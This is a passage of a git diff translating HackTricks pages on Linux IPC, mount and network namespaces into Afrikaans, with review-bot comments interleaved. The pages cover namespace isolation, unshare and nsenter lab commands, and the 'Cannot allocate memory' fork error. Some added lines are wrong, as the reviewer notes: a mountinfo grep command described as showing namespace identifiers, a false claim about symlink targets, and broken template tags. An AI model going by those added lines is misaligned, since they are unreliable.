parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleutelbesonderhede en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-sisteemaanroep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. 
Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weesouerprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie nie 'n nuwe PID kan toeken by die skep van 'n nuwe proses nie, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. 
+Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
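Review bot: three problems in the `Fout: bash: fork:` section. First, the nested bullets lost their indentation (`-   - The Linux kernel ...` became `+- Die Linux-kernel ...`), so the sub-points no longer render under items 1 to 3 of the numbered list; restore the leading spaces. Second, `bash: fork: Cannot allocate memory` is literal shell output and should stay in English, both on the `Fout:` line and in the quoted `"Kan nie geheue toewys nie" -fout` under item 2, because readers will search for the string they actually see. Third, `weesouerprosesse` is a mistranslation of "orphan processes"; `weesprosesse` is the intended word. The same section in the mount-namespace file below has the identical issues.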
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +ls -l /proc/$$/ns/ipc +``` + +Hier is die betekenis van die opdrag: + +- `ls -l`: Gee 'n gedetailleerde lys van die spesifiseerde lêer. +- `/proc/$$/ns/ipc`: Die pad na die IPC-namespace van die huidige proses. + +As die uitset van die opdrag 'n simboliese skakel na 'n lêer in die `/proc`-sisteem is, beteken dit dat jou proses in daardie spesifieke namespace is. ```bash ls -l /proc/self/ns/ipc lrwxrwxrwx 1 root root 0 Apr 4 20:37 /proc/self/ns/ipc -> 'ipc:[4026531839]' ``` - -### Find all IPC namespaces +### Vind alle IPC-ruimtes {% code overflow="wrap" %} ```bash @@ -79,18 +86,17 @@ sudo find /proc -maxdepth 3 -type l -name ipc -exec readlink {} \; 2>/dev/null | # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name ipc -exec ls -l {} \; 2>/dev/null | grep ``` +{% code %} + +### Betree binne 'n IPC-namespace + {% endcode %} - -### Enter inside an IPC namespace - ```bash nsenter -i TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy kan **nie** **toegang kry tot 'n ander namespace sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/net`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/net`). - -### Create IPC object - +### Skep IPC-voorwerp ```bash # Container sudo unshare -i /bin/bash 
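Review bot: the GitBook code template is now mismatched in `### Vind alle IPC-ruimtes`: a new `{% code %}` is inserted after the closing fence, so the existing `{% endcode %}` closes that new tag instead of the `{% code overflow="wrap" %}` opened before the `find` block, leaving it unclosed and wrapping the `### Betree binne 'n IPC-namespace` heading inside a code template. Remove the added `{% code %}` and move the heading back below `{% endcode %}` as it was. Separately, the paragraph added under `### Kyk watter namespace jou proses in is` duplicates the kept `ls -l /proc/self/ns/ipc` block and its last sentence is wrong: the symlink target (`ipc:[4026531839]` in the very next block) is the namespace identifier, not "'n lêer in die `/proc`-sisteem"; drop the added paragraph.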
@@ -99,28 +105,27 @@ Shared memory id: 0 ipcs -m ------ Shared Memory Segments -------- -key shmid owner perms bytes nattch status -0x2fba9021 0 root 644 100 0 +key shmid owner perms bytes nattch status +0x2fba9021 0 root 644 100 0 # From the host ipcs -m # Nothing is seen ``` - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
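Review bot: the `-`/`+` pairs for the `key shmid owner perms bytes nattch status` header and the `0x2fba9021 0 root 644 100 0` row are identical as rendered here, so the change appears to be whitespace only. This is captured `ipcs -m` output and should be left byte-for-byte as copied so its column alignment matches what the tool prints; revert the two lines.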
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md index b222577fc..a75895a2d 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md @@ -1,80 +1,82 @@ -# Mount Namespace +# Monteer Naamruimte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A mount namespace is a Linux kernel feature that provides isolation of the file system mount points seen by a group of processes. Each mount namespace has its own set of file system mount points, and **changes to the mount points in one namespace do not affect other namespaces**. This means that processes running in different mount namespaces can have different views of the file system hierarchy. +'n Monteer-naamruimte is 'n Linux-kernelkenmerk wat isolasie van die lêerstelsel-monteerpunte wat deur 'n groep prosesse gesien word, bied. Elke monteer-naamruimte het sy eie stel lêerstelsel-monteerpunte, en **veranderings aan die monteerpunte in een naamruimte beïnvloed nie ander naamruimtes nie**. Dit beteken dat prosesse wat in verskillende monteer-naamruimtes loop, verskillende sienings van die lêerstelsel-hierargie kan hê. -Mount namespaces are particularly useful in containerization, where each container should have its own file system and configuration, isolated from other containers and the host system. +Monteer-naamruimtes is veral nuttig in konteinerisering, waar elke konteiner sy eie lêerstelsel en konfigurasie moet hê, geïsoleer van ander konteinere en die gasheerstelsel. -### How it works: +### Hoe dit werk: -1. When a new mount namespace is created, it is initialized with a **copy of the mount points from its parent namespace**. This means that, at creation, the new namespace shares the same view of the file system as its parent. However, any subsequent changes to the mount points within the namespace will not affect the parent or other namespaces. -2. When a process modifies a mount point within its namespace, such as mounting or unmounting a file system, the **change is local to that namespace** and does not affect other namespaces. This allows each namespace to have its own independent file system hierarchy. -3. 
Processes can move between namespaces using the `setns()` system call, or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWNS` flag. When a process moves to a new namespace or creates one, it will start using the mount points associated with that namespace. -4. **File descriptors and inodes are shared across namespaces**, meaning that if a process in one namespace has an open file descriptor pointing to a file, it can **pass that file descriptor** to a process in another namespace, and **both processes will access the same file**. However, the file's path may not be the same in both namespaces due to differences in mount points. +1. Wanneer 'n nuwe monteer-naamruimte geskep word, word dit geïnisialiseer met 'n **kopie van die monteerpunte van sy ouer-naamruimte**. Dit beteken dat, by skepping, die nuwe naamruimte dieselfde siening van die lêerstelsel deel as sy ouer. Tog sal enige volgende veranderinge aan die monteerpunte binne die naamruimte nie die ouer of ander naamruimtes beïnvloed nie. +2. Wanneer 'n proses 'n monteerpunt binne sy naamruimte wysig, soos die monteer of ontmonteer van 'n lêerstelsel, is die **verandering plaaslik in daardie naamruimte** en beïnvloed dit nie ander naamruimtes nie. Dit maak dit moontlik dat elke naamruimte sy eie onafhanklike lêerstelsel-hierargie het. +3. Prosesse kan tussen naamruimtes beweeg deur die `setns()`-sisteemaanroep te gebruik, of nuwe naamruimtes skep deur die `unshare()`- of `clone()`-sisteemaanroep met die `CLONE_NEWNS`-vlag te gebruik. Wanneer 'n proses na 'n nuwe naamruimte beweeg of een skep, sal dit begin om die monteerpunte wat met daardie naamruimte geassosieer word, te gebruik. +4. **Lêerbeskrywers en inodes word oor naamruimtes gedeel**, wat beteken dat as 'n proses in een naamruimte 'n oop lêerbeskrywer het wat na 'n lêer wys, kan dit **daardie lêerbeskrywer** aan 'n proses in 'n ander naamruimte oordra, en **beide prosesse sal toegang tot dieselfde lêer hê**. 
Die lêer se pad mag egter nie dieselfde wees in beide naamruimtes as gevolg van verskille in monteerpunte nie. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -m [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
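Review bot: the mount-namespace file uses four terms for one concept: `Monteer Naamruimte` in the title, `monteer-naamruimte` in `## Basiese Inligting`, `berg-namespace` in the `--mount-proc` paragraph, and `Monteer-ruimtes` / `Monteer-namespace` in the lab headings further down. Choose either `naamruimte` or `namespace` and either `monteer` or `berg`, and use the pair consistently through the file (the ipc-namespace file has the same `naamruimte` versus `namespace` split between its intro and lab sections).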
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID)-namespaces hanteer. Die sleuteldetails en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-sisteemaanroep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. 
Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weesouerprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie misluk om 'n nuwe PID toe te ken wanneer 'n nuwe proses geskep word, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. 
+Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
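Review bot: same three problems as in the identical section of the ipc-namespace file: the nested `- ` sub-items under items 1 to 3 lost their indentation and will not render nested, the literal bash error `Cannot allocate memory` was translated on the `Fout:` line and in item 2, and `weesouerprosesse` should read `weesprosesse`. Fix both files the same way.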
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/mountinfo | grep "ns" +``` + +Hierdie opdrag sal die `mountinfo`-lêer van jou huidige proses (`$$`) lees en die reëls filter wat die woord "ns" bevat. Die uitset sal die namespace-identifiseerders vir jou proses toon. ```bash ls -l /proc/self/ns/mnt lrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/mnt -> 'mnt:[4026531841]' ``` - -### Find all Mount namespaces +### Vind alle Monteer-ruimtes {% code overflow="wrap" %} ```bash @@ -82,20 +84,19 @@ sudo find /proc -maxdepth 3 -type l -name mnt -exec readlink {} \; 2>/dev/null | # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name mnt -exec ls -l {} \; 2>/dev/null | grep ``` +{% code %} + +### Betree binne 'n Monteer-namespace + {% endcode %} - -### Enter inside a Mount namespace - ```bash nsenter -m TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy kan **nie** **toegang verkry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/mnt`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/mnt`). - -Because new mounts are only accessible within the namespace it's possible that a namespace contains sensitive information that can only be accessible from it. - -### Mount something +Omdat nuwe bergings slegs binne die namespace toeganklik is, is dit moontlik dat 'n namespace sensitiewe inligting bevat wat slegs daarvandaan toeganklik is. +### Monteer iets ```bash # Generate new mount ns unshare -m /bin/bash 
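Review bot: the block added under `### Kyk watter namespace jou proses in is` does not do what its paragraph claims. `cat /proc/$$/mountinfo | grep "ns"` lists mount entries whose text happens to contain the letters `ns`; it does not show namespace identifiers. The kept `ls -l /proc/self/ns/mnt` block directly below is the way to read the mount namespace ID (`mnt:[4026531841]`), so drop the added command and paragraph. Also the same `{% code %}` / `{% endcode %}` mismatch as in the ipc-namespace file: the new `{% code %}` after the `find` block leaves `{% code overflow="wrap" %}` unclosed and wraps the `### Betree binne 'n Monteer-namespace` heading inside a code template; remove it and move the heading back below `{% endcode %}`.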
@@ -109,21 +110,20 @@ ls /tmp/mount_ns_example/test # Exists mount | grep tmpfs # Cannot see "tmpfs on /tmp/mount_ns_example" ls /tmp/mount_ns_example/test # Doesn't exist ``` - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md index 38001fd29..b2c58af59 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md @@ -1,80 +1,91 @@ -# Network Namespace +# Netwerk-namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A network namespace is a Linux kernel feature that provides isolation of the network stack, allowing **each network namespace to have its own independent network configuration**, interfaces, IP addresses, routing tables, and firewall rules. This isolation is useful in various scenarios, such as containerization, where each container should have its own network configuration, independent of other containers and the host system. +'n Netwerk-namespace is 'n Linux-kernelkenmerk wat isolasie van die netwerkstapel bied, wat **elke netwerk-namespace in staat stel om sy eie onafhanklike netwerk-konfigurasie**, koppelvlakke, IP-adresse, roetetabelle en vuremuur-reëls te hê. Hierdie isolasie is nuttig in verskeie scenario's, soos konteinerisasie, waar elke konteiner sy eie netwerk-konfigurasie moet hê, onafhanklik van ander konteinere en die gasheerstelsel. -### How it works: +### Hoe dit werk: -1. When a new network namespace is created, it starts with a **completely isolated network stack**, with **no network interfaces** except for the loopback interface (lo). This means that processes running in the new network namespace cannot communicate with processes in other namespaces or the host system by default. -2. **Virtual network interfaces**, such as veth pairs, can be created and moved between network namespaces. This allows for establishing network connectivity between namespaces or between a namespace and the host system. For example, one end of a veth pair can be placed in a container's network namespace, and the other end can be connected to a **bridge** or another network interface in the host namespace, providing network connectivity to the container. -3. Network interfaces within a namespace can have their **own IP addresses, routing tables, and firewall rules**, independent of other namespaces. 
This allows processes in different network namespaces to have different network configurations and operate as if they are running on separate networked systems. -4. Processes can move between namespaces using the `setns()` system call, or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWNET` flag. When a process moves to a new namespace or creates one, it will start using the network configuration and interfaces associated with that namespace. +1. Wanneer 'n nuwe netwerk-namespace geskep word, begin dit met 'n **volledig geïsoleerde netwerkstapel**, met **geen netwerkkoppelvlakke** behalwe die lusback-koppelvlak (lo). Dit beteken dat prosesse wat in die nuwe netwerk-namespace loop, nie standaard kan kommunikeer met prosesse in ander namespaces of die gasheerstelsel nie. +2. **Virtuele netwerkkoppelvlakke**, soos veth-pare, kan geskep word en tussen netwerk-namespaces geskuif word. Dit maak dit moontlik om netwerkverbinding tussen namespaces of tussen 'n namespace en die gasheerstelsel te vestig. Byvoorbeeld, een einde van 'n veth-paar kan in 'n konteiner se netwerk-namespace geplaas word, en die ander einde kan aangesluit word op 'n **brug** of 'n ander netwerkkoppelvlak in die gasheer-namespace, wat netwerkverbinding aan die konteiner bied. +3. Netwerkkoppelvlakke binne 'n namespace kan hul **eie IP-adresse, roetetabelle en vuremuur-reëls** hê, onafhanklik van ander namespaces. Dit maak dit moontlik vir prosesse in verskillende netwerk-namespaces om verskillende netwerk-konfigurasies te hê en te werk asof hulle op afsonderlike netwerkstelsels loop. +4. Prosesse kan tussen namespaces beweeg deur die `setns()`-sisteemaanroep te gebruik, of nuwe namespaces kan geskep word deur die `unshare()`- of `clone()`-sisteemaanroep met die `CLONE_NEWNET`-vlag te gebruik. Wanneer 'n proses na 'n nuwe namespace beweeg of een skep, sal dit begin om die netwerk-konfigurasie en koppelvlakke wat met daardie namespace geassosieer is, te gebruik. 
-## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Namespaces #### CLI - ```bash sudo unshare -n [--mount-proc] /bin/bash # Run ifconfig or ip -a ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleuteldetails en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak 